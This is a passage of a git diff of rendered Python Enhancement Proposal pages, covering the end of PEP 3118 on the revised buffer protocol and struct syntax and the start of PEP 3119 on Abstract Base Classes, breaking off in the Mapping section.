Return a memoryview object to a contiguous chunk of memory represented +by obj. If a copy must be made (because the memory pointed to by obj +is not contiguous), then a new bytes object will be created and become +the base object for the returned memory view object.

+

The buffertype argument can be PyBUF_READ, PyBUF_WRITE, +PyBUF_UPDATEIFCOPY to determine whether the returned buffer should be +readable, writable, or set to update the original buffer if a copy +must be made. If buffertype is PyBUF_WRITE and the buffer is not +contiguous an error will be raised. In this circumstance, the user +can use PyBUF_UPDATEIFCOPY to ensure that a writable temporary +contiguous buffer is returned. The contents of this contiguous buffer +will be copied back into the original object after the memoryview +object is deleted as long as the original object is writable. If this +is not allowed by the original object, then a BufferError is raised.

+

If the object is multi-dimensional, then if fortran is ‘F’, the first +dimension of the underlying array will vary the fastest in the buffer. +If fortran is ‘C’, then the last dimension will vary the fastest +(C-style contiguous). If fortran is ‘A’, then it does not matter and +you will get whatever the object decides is more efficient. If a copy +is made, then the memory must be freed by calling PyMem_Free.

+

You receive a new reference to the memoryview object.

+
int PyObject_CopyToObject(PyObject *obj, void *buf, Py_ssize_t len,
+                          char fortran)
+
+
+

Copy len bytes of data pointed to by the contiguous chunk of +memory pointed to by buf into the buffer exported by obj. Return +0 on success and return -1 and raise an error on failure. If the +object does not have a writable buffer, then an error is raised. If +fortran is ‘F’, then if the object is multi-dimensional, then the data +will be copied into the array in Fortran-style (first dimension varies +the fastest). If fortran is ‘C’, then the data will be copied into +the array in C-style (last dimension varies the fastest). If fortran +is ‘A’, then it does not matter and the copy will be made in whatever +way is more efficient.

+
int PyObject_CopyData(PyObject *dest, PyObject *src)
+
+
+

These last three C-API calls allow a standard way of getting data in and +out of Python objects into contiguous memory areas no matter how it is +actually stored. These calls use the extended buffer interface to perform +their work.

+
int PyBuffer_IsContiguous(Py_buffer *view, char fortran)
+
+
+

Return 1 if the memory defined by the view object is C-style (fortran += ‘C’) or Fortran-style (fortran = ‘F’) contiguous or either one +(fortran = ‘A’). Return 0 otherwise.

+
void PyBuffer_FillContiguousStrides(int ndim, Py_ssize_t *shape,
+                                    Py_ssize_t *strides, Py_ssize_t itemsize,
+                                    char fortran)
+
+
+

Fill the strides array with byte-strides of a contiguous (C-style if +fortran is ‘C’ or Fortran-style if fortran is ‘F’ array of the given +shape with the given number of bytes per element.

+
int PyBuffer_FillInfo(Py_buffer *view, void *buf,
+                      Py_ssize_t len, int readonly, int infoflags)
+
+
+

Fills in a buffer-info structure correctly for an exporter that can +only share a contiguous chunk of memory of “unsigned bytes” of the +given length. Returns 0 on success and -1 (with raising an error) on +error.

+
PyExc_BufferError
+
+
+

A new error object for returning buffer errors which arise because an +exporter cannot provide the kind of buffer that a consumer expects. +This will also be raised when a consumer requests a buffer from an +object that does not provide the protocol.

+
+
+

Additions to the struct string-syntax

+

The struct string-syntax is missing some characters to fully +implement data-format descriptions already available elsewhere (in +ctypes and NumPy for example). The Python 2.5 specification is +at http://docs.python.org/library/struct.html.

+

Here are the proposed additions:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CharacterDescription
‘t’bit (number before states how many bits)
‘?’platform _Bool type
‘g’long double
‘c’ucs-1 (latin-1) encoding
‘u’ucs-2
‘w’ucs-4
‘O’pointer to Python Object
‘Z’complex (whatever the next specifier is)
‘&’specific pointer (prefix before another character)
‘T{}’structure (detailed layout inside {})
‘(k1,k2,…,kn)’multi-dimensional array of whatever follows
‘:name:’optional name of the preceding element
‘X{}’
+
pointer to a function (optional function
signature inside {} with any return value +preceded by -> and placed at the end)
+
+
+

The struct module will be changed to understand these as well and +return appropriate Python objects on unpacking. Unpacking a +long-double will return a decimal object or a ctypes long-double. +Unpacking ‘u’ or ‘w’ will return Python unicode. Unpacking a +multi-dimensional array will return a list (of lists if >1d). +Unpacking a pointer will return a ctypes pointer object. Unpacking a +function pointer will return a ctypes call-object (perhaps). Unpacking +a bit will return a Python Bool. White-space in the struct-string +syntax will be ignored if it isn’t already. Unpacking a named-object +will return some kind of named-tuple-like object that acts like a +tuple but whose entries can also be accessed by name. Unpacking a +nested structure will return a nested tuple.

+

Endian-specification (‘!’, ‘@’,’=’,’>’,’<’, ‘^’) is also allowed +inside the string so that it can change if needed. The +previously-specified endian string is in force until changed. The +default endian is ‘@’ which means native data-types and alignment. If +un-aligned, native data-types are requested, then the endian +specification is ‘^’.

+

According to the struct-module, a number can precede a character +code to specify how many of that type there are. The +(k1,k2,...,kn) extension also allows specifying if the data is +supposed to be viewed as a (C-style contiguous, last-dimension +varies the fastest) multi-dimensional array of a particular format.

+

Functions should be added to ctypes to create a ctypes object from +a struct description, and add long-double, and ucs-2 to ctypes.

+
+
+

Examples of Data-Format Descriptions

+

Here are some examples of C-structures and how they would be +represented using the struct-style syntax.

+

<named> is the constructor for a named-tuple (not-specified yet).

+
+
float
'd' <–> Python float
+
complex double
'Zd' <–> Python complex
+
RGB Pixel data
'BBB' <–> (int, int, int) +'B:r: B:g: B:b:' <–> <named>((int, int, int), (‘r’,’g’,’b’))
+
Mixed endian (weird but possible)
'>i:big: <i:little:' <–> <named>((int, int), (‘big’, ‘little’))
+
Nested structure
struct {
+     int ival;
+     struct {
+         unsigned short sval;
+         unsigned char bval;
+         unsigned char cval;
+     } sub;
+}
+"""i:ival:
+   T{
+      H:sval:
+      B:bval:
+      B:cval:
+    }:sub:
+"""
+
+
+
+
Nested array
struct {
+     int ival;
+     double data[16*4];
+}
+"""i:ival:
+   (16,4)d:data:
+"""
+
+
+
+
+

Note, that in the last example, the C-structure compared against is +intentionally a 1-d array and not a 2-d array data[16][4]. The reason +for this is to avoid the confusions between static multi-dimensional +arrays in C (which are laid out contiguously) and dynamic +multi-dimensional arrays which use the same syntax to access elements, +data[0][1], but whose memory is not necessarily contiguous. The +struct-syntax always uses contiguous memory and the +multi-dimensional character is information about the memory to be +communicated by the exporter.

+

In other words, the struct-syntax description does not have to match +the C-syntax exactly as long as it describes the same memory layout. +The fact that a C-compiler would think of the memory as a 1-d array of +doubles is irrelevant to the fact that the exporter wanted to +communicate to the consumer that this field of the memory should be +thought of as a 2-d array where a new dimension is considered after +every 4 elements.

+
+
+

Code to be affected

+

All objects and modules in Python that export or consume the old +buffer interface will be modified. Here is a partial list.

+
    +
  • buffer object
  • +
  • bytes object
  • +
  • string object
  • +
  • unicode object
  • +
  • array module
  • +
  • struct module
  • +
  • mmap module
  • +
  • ctypes module
  • +
+

Anything else using the buffer API.

+
+
+

Issues and Details

+

It is intended that this PEP will be back-ported to Python 2.6 by +adding the C-API and the two functions to the existing buffer +protocol.

+

Previous versions of this PEP proposed a read/write locking scheme, +but it was later perceived as a) too complicated for common simple use +cases that do not require any locking and b) too simple for use cases +that required concurrent read/write access to a buffer with changing, +short-living locks. It is therefore left to users to implement their +own specific locking scheme around buffer objects if they require +consistent views across concurrent read/write access. A future PEP +may be proposed which includes a separate locking API after some +experience with these user-schemes is obtained

+

The sharing of strided memory and suboffsets is new and can be seen as +a modification of the multiple-segment interface. It is motivated by +NumPy and the PIL. NumPy objects should be able to share their +strided memory with code that understands how to manage strided memory +because strided memory is very common when interfacing with compute +libraries.

+

Also, with this approach it should be possible to write generic code +that works with both kinds of memory without copying.

+

Memory management of the format string, the shape array, the strides +array, and the suboffsets array in the bufferinfo structure is always +the responsibility of the exporting object. The consumer should not +set these pointers to any other memory or try to free them.

+

Several ideas were discussed and rejected:

+
+
Having a “releaser” object whose release-buffer was called. This +was deemed unacceptable because it caused the protocol to be +asymmetric (you called release on something different than you +“got” the buffer from). It also complicated the protocol without +providing a real benefit.

Passing all the struct variables separately into the function. +This had the advantage that it allowed one to set NULL to +variables that were not of interest, but it also made the function +call more difficult. The flags variable allows the same +ability of consumers to be “simple” in how they call the protocol.

+
+
+
+

Code

+

The authors of the PEP promise to contribute and maintain the code for +this proposal but will welcome any help.

+
+
+

Examples

+
+

Ex. 1

+

This example shows how an image object that uses contiguous lines might expose its buffer:

+
struct rgba {
+    unsigned char r, g, b, a;
+};
+
+struct ImageObject {
+    PyObject_HEAD;
+    ...
+    struct rgba** lines;
+    Py_ssize_t height;
+    Py_ssize_t width;
+    Py_ssize_t shape_array[2];
+    Py_ssize_t stride_array[2];
+    Py_ssize_t view_count;
+};
+
+
+

“lines” points to malloced 1-D array of (struct rgba*). Each pointer +in THAT block points to a separately malloced array of (struct rgba).

+

In order to access, say, the red value of the pixel at x=30, y=50, you’d use “lines[50][30].r”.

+

So what does ImageObject’s getbuffer do? Leaving error checking out:

+
int Image_getbuffer(PyObject *self, Py_buffer *view, int flags) {
+
+    static Py_ssize_t suboffsets[2] = { 0, -1};
+
+    view->buf = self->lines;
+    view->len = self->height*self->width;
+    view->readonly = 0;
+    view->ndims = 2;
+    self->shape_array[0] = height;
+    self->shape_array[1] = width;
+    view->shape = &self->shape_array;
+    self->stride_array[0] = sizeof(struct rgba*);
+    self->stride_array[1] = sizeof(struct rgba);
+    view->strides = &self->stride_array;
+    view->suboffsets = suboffsets;
+
+    self->view_count ++;
+
+    return 0;
+}
+
+
+int Image_releasebuffer(PyObject *self, Py_buffer *view) {
+    self->view_count--;
+    return 0;
+}
+
+
+
+
+

Ex. 2

+

This example shows how an object that wants to expose a contiguous +chunk of memory (which will never be re-allocated while the object is +alive) would do that.

+
int myobject_getbuffer(PyObject *self, Py_buffer *view, int flags) {
+
+    void *buf;
+    Py_ssize_t len;
+    int readonly=0;
+
+    buf = /* Point to buffer */
+    len = /* Set to size of buffer */
+    readonly = /* Set to 1 if readonly */
+
+    return PyObject_FillBufferInfo(view, buf, len, readonly, flags);
+}
+
+/* No releasebuffer is necessary because the memory will never
+   be re-allocated
+*/
+
+
+
+
+

Ex. 3

+

A consumer that wants to only get a simple contiguous chunk of bytes +from a Python object, obj would do the following:

+
Py_buffer view;
+int ret;
+
+if (PyObject_GetBuffer(obj, &view, Py_BUF_SIMPLE) < 0) {
+     /* error return */
+}
+
+/* Now, view.buf is the pointer to memory
+        view.len is the length
+        view.readonly is whether or not the memory is read-only.
+ */
+
+
+/* After using the information and you don't need it anymore */
+
+if (PyBuffer_Release(obj, &view) < 0) {
+        /* error return */
+}
+
+
+
+
+

Ex. 4

+

A consumer that wants to be able to use any object’s memory but is +writing an algorithm that only handle contiguous memory could do the following:

+
void *buf;
+Py_ssize_t len;
+char *format;
+int copy;
+
+copy = PyObject_GetContiguous(obj, &buf, &len, &format, 0, 'A');
+if (copy < 0) {
+   /* error return */
+}
+
+/* process memory pointed to by buffer if format is correct */
+
+/* Optional:
+
+   if, after processing, we want to copy data from buffer back
+   into the object
+
+   we could do
+   */
+
+if (PyObject_CopyToObject(obj, buf, len, 'A') < 0) {
+       /*        error return */
+}
+
+/* Make sure that if a copy was made, the memory is freed */
+if (copy == 1) PyMem_Free(buf);
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3118.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3119/index.html b/pep-3119/index.html new file mode 100644 index 00000000000..0f395f1084e --- /dev/null +++ b/pep-3119/index.html @@ -0,0 +1,955 @@ + + + + + + + + PEP 3119 – Introducing Abstract Base Classes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3119 – Introducing Abstract Base Classes

+
+
Author:
+
Guido van Rossum <guido at python.org>, Talin <viridia at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+
26-Apr-2007, 11-May-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This is a proposal to add Abstract Base Class (ABC) support to Python +3000. It proposes:

+
    +
  • A way to overload isinstance() and issubclass().
  • +
  • A new module abc which serves as an “ABC support framework”. It +defines a metaclass for use with ABCs and a decorator that can be +used to define abstract methods.
  • +
  • Specific ABCs for containers and iterators, to be added to the +collections module.
  • +
+

Much of the thinking that went into the proposal is not about the +specific mechanism of ABCs, as contrasted with Interfaces or Generic +Functions (GFs), but about clarifying philosophical issues like “what +makes a set”, “what makes a mapping” and “what makes a sequence”.

+

There’s also a companion PEP 3141, which defines ABCs for numeric +types.

+
+

Acknowledgements

+

Talin wrote the Rationale below [1] as well as most of the section on +ABCs vs. Interfaces. For that alone he deserves co-authorship. The +rest of the PEP uses “I” referring to the first author.

+
+
+
+

Rationale

+

In the domain of object-oriented programming, the usage patterns for +interacting with an object can be divided into two basic categories, +which are ‘invocation’ and ‘inspection’.

+

Invocation means interacting with an object by invoking its methods. +Usually this is combined with polymorphism, so that invoking a given +method may run different code depending on the type of an object.

+

Inspection means the ability for external code (outside of the +object’s methods) to examine the type or properties of that object, +and make decisions on how to treat that object based on that +information.

+

Both usage patterns serve the same general end, which is to be able to +support the processing of diverse and potentially novel objects in a +uniform way, but at the same time allowing processing decisions to be +customized for each different type of object.

+

In classical OOP theory, invocation is the preferred usage pattern, +and inspection is actively discouraged, being considered a relic of an +earlier, procedural programming style. However, in practice this view +is simply too dogmatic and inflexible, and leads to a kind of design +rigidity that is very much at odds with the dynamic nature of a +language like Python.

+

In particular, there is often a need to process objects in a way that +wasn’t anticipated by the creator of the object class. It is not +always the best solution to build in to every object methods that +satisfy the needs of every possible user of that object. Moreover, +there are many powerful dispatch philosophies that are in direct +contrast to the classic OOP requirement of behavior being strictly +encapsulated within an object, examples being rule or pattern-match +driven logic.

+

On the other hand, one of the criticisms of inspection by classic +OOP theorists is the lack of formalisms and the ad hoc nature of what +is being inspected. In a language such as Python, in which almost any +aspect of an object can be reflected and directly accessed by external +code, there are many different ways to test whether an object conforms +to a particular protocol or not. For example, if asking ‘is this +object a mutable sequence container?’, one can look for a base class +of ‘list’, or one can look for a method named ‘__getitem__’. But note +that although these tests may seem obvious, neither of them are +correct, as one generates false negatives, and the other false +positives.

+

The generally agreed-upon remedy is to standardize the tests, and +group them into a formal arrangement. This is most easily done by +associating with each class a set of standard testable properties, +either via the inheritance mechanism or some other means. Each test +carries with it a set of promises: it contains a promise about the +general behavior of the class, and a promise as to what other class +methods will be available.

+

This PEP proposes a particular strategy for organizing these tests +known as Abstract Base Classes, or ABC. ABCs are simply Python +classes that are added into an object’s inheritance tree to signal +certain features of that object to an external inspector. Tests are +done using isinstance(), and the presence of a particular ABC +means that the test has passed.

+

In addition, the ABCs define a minimal set of methods that establish +the characteristic behavior of the type. Code that discriminates +objects based on their ABC type can trust that those methods will +always be present. Each of these methods are accompanied by an +generalized abstract semantic definition that is described in the +documentation for the ABC. These standard semantic definitions are +not enforced, but are strongly recommended.

+

Like all other things in Python, these promises are in the nature of a +friendly agreement, which in this case means that while the +language does enforce some of the promises made in the ABC, it is up +to the implementer of the concrete class to insure that the remaining +ones are kept.

+
+
+

Specification

+

The specification follows the categories listed in the abstract:

+
    +
  • A way to overload isinstance() and issubclass().
  • +
  • A new module abc which serves as an “ABC support framework”. It +defines a metaclass for use with ABCs and a decorator that can be +used to define abstract methods.
  • +
  • Specific ABCs for containers and iterators, to be added to the +collections module.
  • +
+
+

Overloading isinstance() and issubclass()

+

During the development of this PEP and of its companion, PEP 3141, we +repeatedly faced the choice between standardizing more, fine-grained +ABCs or fewer, coarse-grained ones. For example, at one stage, PEP +3141 introduced the following stack of base classes used for complex +numbers: MonoidUnderPlus, AdditiveGroup, Ring, Field, Complex (each +derived from the previous). And the discussion mentioned several +other algebraic categorizations that were left out: Algebraic, +Transcendental, and IntegralDomain, and PrincipalIdealDomain. In +earlier versions of the current PEP, we considered the use cases for +separate classes like Set, ComposableSet, MutableSet, HashableSet, +MutableComposableSet, HashableComposableSet.

+

The dilemma here is that we’d rather have fewer ABCs, but then what +should a user do who needs a less refined ABC? Consider e.g. the +plight of a mathematician who wants to define their own kind of +Transcendental numbers, but also wants float and int to be considered +Transcendental. PEP 3141 originally proposed to patch float.__bases__ +for that purpose, but there are some good reasons to keep the built-in +types immutable (for one, they are shared between all Python +interpreters running in the same address space, as is used by +mod_python [16]).

+

Another example would be someone who wants to define a generic +function (PEP 3124) for any sequence that has an append() method. +The Sequence ABC (see below) doesn’t promise the append() +method, while MutableSequence requires not only append() but +also various other mutating methods.

+

To solve these and similar dilemmas, the next section will propose a +metaclass for use with ABCs that will allow us to add an ABC as a +“virtual base class” (not the same concept as in C++) to any class, +including to another ABC. This allows the standard library to define +ABCs Sequence and MutableSequence and register these as +virtual base classes for built-in types like basestring, tuple +and list, so that for example the following conditions are all +true:

+
isinstance([], Sequence)
+issubclass(list, Sequence)
+issubclass(list, MutableSequence)
+isinstance((), Sequence)
+not issubclass(tuple, MutableSequence)
+isinstance("", Sequence)
+issubclass(bytearray, MutableSequence)
+
+
+

The primary mechanism proposed here is to allow overloading the +built-in functions isinstance() and issubclass(). The +overloading works as follows: The call isinstance(x, C) first +checks whether C.__instancecheck__ exists, and if so, calls +C.__instancecheck__(x) instead of its normal implementation. +Similarly, the call issubclass(D, C) first checks whether +C.__subclasscheck__ exists, and if so, calls +C.__subclasscheck__(D) instead of its normal implementation.

+

Note that the magic names are not __isinstance__ and +__issubclass__; this is because the reversal of the arguments +could cause confusion, especially for the issubclass() overloader.

+

A prototype implementation of this is given in [12].

+

Here is an example with (naively simple) implementations of +__instancecheck__ and __subclasscheck__:

+
class ABCMeta(type):
+
+    def __instancecheck__(cls, inst):
+        """Implement isinstance(inst, cls)."""
+        return any(cls.__subclasscheck__(c)
+                   for c in {type(inst), inst.__class__})
+
+    def __subclasscheck__(cls, sub):
+        """Implement issubclass(sub, cls)."""
+        candidates = cls.__dict__.get("__subclass__", set()) | {cls}
+        return any(c in candidates for c in sub.mro())
+
+class Sequence(metaclass=ABCMeta):
+    __subclass__ = {list, tuple}
+
+assert issubclass(list, Sequence)
+assert issubclass(tuple, Sequence)
+
+class AppendableSequence(Sequence):
+    __subclass__ = {list}
+
+assert issubclass(list, AppendableSequence)
+assert isinstance([], AppendableSequence)
+
+assert not issubclass(tuple, AppendableSequence)
+assert not isinstance((), AppendableSequence)
+
+
+

The next section proposes a full-fledged implementation.

+
+
+

The abc Module: an ABC Support Framework

+

The new standard library module abc, written in pure Python, +serves as an ABC support framework. It defines a metaclass +ABCMeta and decorators @abstractmethod and +@abstractproperty. A sample implementation is given by [13].

+

The ABCMeta class overrides __instancecheck__ and +__subclasscheck__ and defines a register method. The +register method takes one argument, which must be a class; after +the call B.register(C), the call issubclass(C, B) will return +True, by virtue of B.__subclasscheck__(C) returning True. +Also, isinstance(x, B) is equivalent to issubclass(x.__class__, +B) or issubclass(type(x), B). (It is possible type(x) and +x.__class__ are not the same object, e.g. when x is a proxy +object.)

+

These methods are intended to be called on classes whose metaclass +is (derived from) ABCMeta; for example:

+
from abc import ABCMeta
+
+class MyABC(metaclass=ABCMeta):
+    pass
+
+MyABC.register(tuple)
+
+assert issubclass(tuple, MyABC)
+assert isinstance((), MyABC)
+
+
+

The last two asserts are equivalent to the following two:

+
assert MyABC.__subclasscheck__(tuple)
+assert MyABC.__instancecheck__(())
+
+
+

Of course, you can also directly subclass MyABC:

+
class MyClass(MyABC):
+    pass
+
+assert issubclass(MyClass, MyABC)
+assert isinstance(MyClass(), MyABC)
+
+
+

Also, of course, a tuple is not a MyClass:

+
assert not issubclass(tuple, MyClass)
+assert not isinstance((), MyClass)
+
+
+

You can register another class as a subclass of MyClass:

+
MyClass.register(list)
+
+assert issubclass(list, MyClass)
+assert issubclass(list, MyABC)
+
+
+

You can also register another ABC:

+
class AnotherClass(metaclass=ABCMeta):
+    pass
+
+AnotherClass.register(basestring)
+
+MyClass.register(AnotherClass)
+
+assert isinstance(str, MyABC)
+
+
+

That last assert requires tracing the following superclass-subclass +relationships:

+
MyABC -> MyClass (using regular subclassing)
+MyClass -> AnotherClass (using registration)
+AnotherClass -> basestring (using registration)
+basestring -> str (using regular subclassing)
+
+
+

The abc module also defines a new decorator, @abstractmethod, +to be used to declare abstract methods. A class containing at least +one method declared with this decorator that hasn’t been overridden +yet cannot be instantiated. Such methods may be called from the +overriding method in the subclass (using super or direct +invocation). For example:

+
from abc import ABCMeta, abstractmethod
+
+class A(metaclass=ABCMeta):
+    @abstractmethod
+    def foo(self): pass
+
+A()  # raises TypeError
+
+class B(A):
+    pass
+
+B()  # raises TypeError
+
+class C(A):
+    def foo(self): print(42)
+
+C()  # works
+
+
+

Note: The @abstractmethod decorator should only be used +inside a class body, and only for classes whose metaclass is (derived +from) ABCMeta. Dynamically adding abstract methods to a class, or +attempting to modify the abstraction status of a method or class once +it is created, are not supported. The @abstractmethod only +affects subclasses derived using regular inheritance; “virtual +subclasses” registered with the register() method are not affected.

+

Implementation: The @abstractmethod decorator sets the +function attribute __isabstractmethod__ to the value True. +The ABCMeta.__new__ method computes the type attribute +__abstractmethods__ as the set of all method names that have an +__isabstractmethod__ attribute whose value is true. It does this +by combining the __abstractmethods__ attributes of the base +classes, adding the names of all methods in the new class dict that +have a true __isabstractmethod__ attribute, and removing the names +of all methods in the new class dict that don’t have a true +__isabstractmethod__ attribute. If the resulting +__abstractmethods__ set is non-empty, the class is considered +abstract, and attempts to instantiate it will raise TypeError. +(If this were implemented in CPython, an internal flag +Py_TPFLAGS_ABSTRACT could be used to speed up this check [6].)

+

Discussion: Unlike Java’s abstract methods or C++’s pure abstract +methods, abstract methods as defined here may have an implementation. +This implementation can be called via the super mechanism from the +class that overrides it. This could be useful as an end-point for a +super-call in framework using cooperative multiple-inheritance [7], +[8].

+

A second decorator, @abstractproperty, is defined in order to +define abstract data attributes. Its implementation is a subclass of +the built-in property class that adds an __isabstractmethod__ +attribute:

+
class abstractproperty(property):
+    __isabstractmethod__ = True
+
+
+

It can be used in two ways:

+
class C(metaclass=ABCMeta):
+
+    # A read-only property:
+
+    @abstractproperty
+    def readonly(self):
+        return self.__x
+
+    # A read-write property (cannot use decorator syntax):
+
+    def getx(self):
+        return self.__x
+    def setx(self, value):
+        self.__x = value
+    x = abstractproperty(getx, setx)
+
+
+

Similar to abstract methods, a subclass inheriting an abstract +property (declared using either the decorator syntax or the longer +form) cannot be instantiated unless it overrides that abstract +property with a concrete property.

+
+
+

ABCs for Containers and Iterators

+

The collections module will define ABCs necessary and sufficient +to work with sets, mappings, sequences, and some helper types such as +iterators and dictionary views. All ABCs have the above-mentioned +ABCMeta as their metaclass.

+

The ABCs provide implementations of their abstract methods that are +technically valid but fairly useless; e.g. __hash__ returns 0, and +__iter__ returns an empty iterator. In general, the abstract +methods represent the behavior of an empty container of the indicated +type.

+

Some ABCs also provide concrete (i.e. non-abstract) methods; for +example, the Iterator class has an __iter__ method returning +itself, fulfilling an important invariant of iterators (which in +Python 2 has to be implemented anew by each iterator class). These +ABCs can be considered “mix-in” classes.

+

No ABCs defined in the PEP override __init__, __new__, +__str__ or __repr__. Defining a standard constructor +signature would unnecessarily constrain custom container types, for +example Patricia trees or gdbm files. Defining a specific string +representation for a collection is similarly left up to individual +implementations.

+

Note: There are no ABCs for ordering operations (__lt__, +__le__, __ge__, __gt__). Defining these in a base class +(abstract or not) runs into problems with the accepted type for the +second operand. For example, if class Ordering defined +__lt__, one would assume that for any Ordering instances x +and y, x < y would be defined (even if it just defines a +partial ordering). But this cannot be the case: If both list and +str derived from Ordering, this would imply that [1, 2] < +(1, 2) should be defined (and presumably return False), while in +fact (in Python 3000!) such “mixed-mode comparisons” operations are +explicitly forbidden and raise TypeError. See PEP 3100 and [14] +for more information. (This is a special case of a more general issue +with operations that take another argument of the same type).

+
+

One Trick Ponies

+

These abstract classes represent single methods like __iter__ or +__len__.

+
+
Hashable
The base class for classes defining __hash__. The +__hash__ method should return an integer. The abstract +__hash__ method always returns 0, which is a valid (albeit +inefficient) implementation. Invariant: If classes C1 and +C2 both derive from Hashable, the condition o1 == o2 +must imply hash(o1) == hash(o2) for all instances o1 of +C1 and all instances o2 of C2. In other words, two +objects should never compare equal if they have different hash +values.

Another constraint is that hashable objects, once created, should +never change their value (as compared by ==) or their hash +value. If a class cannot guarantee this, it should not derive +from Hashable; if it cannot guarantee this for certain +instances, __hash__ for those instances should raise a +TypeError exception.

+

Note: being an instance of this class does not imply that an +object is immutable; e.g. a tuple containing a list as a member is +not immutable; its __hash__ method raises TypeError. +(This is because it recursively tries to compute the hash of each +member; if a member is unhashable it raises TypeError.)

+
+
Iterable
The base class for classes defining __iter__. The +__iter__ method should always return an instance of +Iterator (see below). The abstract __iter__ method +returns an empty iterator.
+
Iterator
The base class for classes defining __next__. This derives +from Iterable. The abstract __next__ method raises +StopIteration. The concrete __iter__ method returns +self. Note the distinction between Iterable and +Iterator: an Iterable can be iterated over, i.e. supports +the __iter__ methods; an Iterator is what the built-in +function iter() returns, i.e. supports the __next__ +method.
+
Sized
The base class for classes defining __len__. The __len__ +method should return an Integer (see “Numbers” below) >= 0. +The abstract __len__ method returns 0. Invariant: If a +class C derives from Sized as well as from Iterable, +the invariant sum(1 for x in c) == len(c) should hold for any +instance c of C.
+
Container
The base class for classes defining __contains__. The +__contains__ method should return a bool. The abstract +__contains__ method returns False. Invariant: If a +class C derives from Container as well as from +Iterable, then (x in c for x in c) should be a generator +yielding only True values for any instance c of C.
+
+

Open issues: Conceivably, instead of using the ABCMeta metaclass, +these classes could override __instancecheck__ and +__subclasscheck__ to check for the presence of the applicable +special method; for example:

+
class Sized(metaclass=ABCMeta):
+    @abstractmethod
+    def __hash__(self):
+        return 0
+    @classmethod
+    def __instancecheck__(cls, x):
+        return hasattr(x, "__len__")
+    @classmethod
+    def __subclasscheck__(cls, C):
+        return hasattr(C, "__bases__") and hasattr(C, "__len__")
+
+
+

This has the advantage of not requiring explicit registration. +However, the semantics are hard to get exactly right given the confusing +semantics of instance attributes vs. class attributes, and that a +class is an instance of its metaclass; the check for __bases__ is +only an approximation of the desired semantics. Strawman: Let’s +do it, but let’s arrange it in such a way that the registration API +also works.

+
+
+

Sets

+

These abstract classes represent read-only sets and mutable sets. The +most fundamental set operation is the membership test, written as x +in s and implemented by s.__contains__(x). This operation is +already defined by the Container class defined above. Therefore, +we define a set as a sized, iterable container for which certain +invariants from mathematical set theory hold.

+

The built-in type set derives from MutableSet. The built-in +type frozenset derives from Set and Hashable.

+
+
Set
This is a sized, iterable container, i.e., a subclass of +Sized, Iterable and Container. Not every subclass of +those three classes is a set though! Sets have the additional +invariant that each element occurs only once (as can be determined +by iteration), and in addition sets define concrete operators that +implement the inequality operations as subset/superset tests. +In general, the invariants for finite sets in mathematics +hold. [11]

Sets with different implementations can be compared safely, +(usually) efficiently and correctly using the mathematical +definitions of the subset/supeset operations for finite sets. +The ordering operations have concrete implementations; subclasses +may override these for speed but should maintain the semantics. +Because Set derives from Sized, __eq__ may take a +shortcut and return False immediately if two sets of unequal +length are compared. Similarly, __le__ may return False +immediately if the first set has more members than the second set. +Note that set inclusion implements only a partial ordering; +e.g. {1, 2} and {1, 3} are not ordered (all three of +<, == and > return False for these arguments). +Sets cannot be ordered relative to mappings or sequences, but they +can be compared to those for equality (and then they always +compare unequal).

+

This class also defines concrete operators to compute union, +intersection, symmetric and asymmetric difference, respectively +__or__, __and__, __xor__ and __sub__. These +operators should return instances of Set. The default +implementations call the overridable class method +_from_iterable() with an iterable argument. This factory +method’s default implementation returns a frozenset instance; +it may be overridden to return another appropriate Set +subclass.

+

Finally, this class defines a concrete method _hash which +computes the hash value from the elements. Hashable subclasses of +Set can implement __hash__ by calling _hash or they +can reimplement the same algorithm more efficiently; but the +algorithm implemented should be the same. Currently the algorithm +is fully specified only by the source code [15].

+

Note: the issubset and issuperset methods found on the +set type in Python 2 are not supported, as these are mostly just +aliases for __le__ and __ge__.

+
+
MutableSet
This is a subclass of Set implementing additional operations +to add and remove elements. The supported methods have the +semantics known from the set type in Python 2 (except for +discard, which is modeled after Java):
+
.add(x)
Abstract method returning a bool that adds the element +x if it isn’t already in the set. It should return +True if x was added, False if it was already +there. The abstract implementation raises +NotImplementedError.
+
.discard(x)
Abstract method returning a bool that removes the element +x if present. It should return True if the element +was present and False if it wasn’t. The abstract +implementation raises NotImplementedError.
+
.pop()
Concrete method that removes and returns an arbitrary item. +If the set is empty, it raises KeyError. The default +implementation removes the first item returned by the set’s +iterator.
+
.toggle(x)
Concrete method returning a bool that adds x to the set if +it wasn’t there, but removes it if it was there. It should +return True if x was added, False if it was +removed.
+
.clear()
Concrete method that empties the set. The default +implementation repeatedly calls self.pop() until +KeyError is caught. (Note: this is likely much slower +than simply creating a new set, even if an implementation +overrides it with a faster approach; but in some cases object +identity is important.)
+
+

This also supports the in-place mutating operations |=, +&=, ^=, -=. These are concrete methods whose right +operand can be an arbitrary Iterable, except for &=, whose +right operand must be a Container. This ABC does not provide +the named methods present on the built-in concrete set type +that perform (almost) the same operations.

+
+
+
+
+

Mappings

+

These abstract classes represent read-only mappings and mutable +mappings. The Mapping class represents the most common read-only +mapping API.

+

The built-in type dict derives from MutableMapping.

+
+
Mapping
A subclass of Container, Iterable and Sized. The keys +of a mapping naturally form a set. The (key, value) pairs (which +must be tuples) are also referred to as items. The items also +form a set. Methods:
+
.__getitem__(key)
Abstract method that returns the value corresponding to +key, or raises KeyError. The implementation always +raises KeyError.
+
.get(key, default=None)
Concrete method returning self[key] if this does not raise +KeyError, and the default value if it does.
+
.__contains__(key)
Concrete method returning True if self[key] does not +raise KeyError, and False if it does.
+
.__len__()
Abstract method returning the number of distinct keys (i.e., +the length of the key set).
+
.__iter__()
Abstract method returning each key in the key set exactly once.
+
.keys()
Concrete method returning the key set as a Set. The +default concrete implementation returns a “view” on the key +set (meaning if the underlying mapping is modified, the view’s +value changes correspondingly); subclasses are not required to +return a view but they should return a Set.
+
.items()
